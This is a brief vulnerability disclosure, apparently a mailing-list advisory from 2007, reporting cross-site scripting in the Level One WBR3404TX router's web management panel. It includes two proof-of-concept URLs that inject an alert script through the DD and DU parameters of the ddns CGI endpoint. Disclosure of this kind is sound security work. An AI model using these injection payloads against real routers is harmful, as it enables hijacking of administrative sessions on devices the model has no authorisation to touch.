Related information

Level One WBR3404TX wireless router crossite scripting

From:	azizov_(at)_itdefence.ru <azizov_(at)_itdefence.ru>
Date:	19.09.2007
Subject:	WBR3404TX Broadband Router XSS

I.Overview
Current firmware version is R1.94p0vTIG (*the latest).
WBR3404TX Broadband Router Web Management   

II.Description
http://[routeraddress]/cgi-
bin/ddns?RC=%40&DG0=x&DP=D&DD=%22%3E%3Cscript%3Ea
lert('xss%20detected!');%3C/script%3E%3Ctext%
20id=%22&DU=&DW=
http://[routeraddress]/cgi-
bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=%22%3E%3Cscript
%3Ealert('xss%20detected!');%3C/script%3E%3Ct
ext%20id=%22&DW=

Open to XSS atacks via the web management panel.